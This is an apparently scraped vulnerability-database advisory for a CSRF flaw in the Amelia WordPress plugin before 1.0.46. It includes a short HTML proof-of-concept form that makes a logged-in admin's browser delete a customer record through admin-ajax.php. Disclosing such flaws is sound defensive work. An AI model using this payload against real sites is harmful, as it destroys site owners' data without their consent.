Lucene search

K
wpexploitMuhamad hidayatWPEX-ID:7C63D76E-34CA-4778-8784-437D446C16E0
HistoryFeb 23, 2022 - 12:00 a.m.

Amelia < 1.0.46 - Arbitrary Customer Deletion via CSRF

2022-02-2300:00:00
muhamad hidayat
265

0.001 Low

EPSS

Percentile

26.0%

The plugin does not have CSRF check in place when deleting customers, which could allow attackers to make a logged in admin delete arbitrary customers via a CSRF attack

<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php?action=wpamelia_api&call=/users/customers/delete/1" method="POST">
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

0.001 Low

EPSS

Percentile

26.0%

Related for WPEX-ID:7C63D76E-34CA-4778-8784-437D446C16E0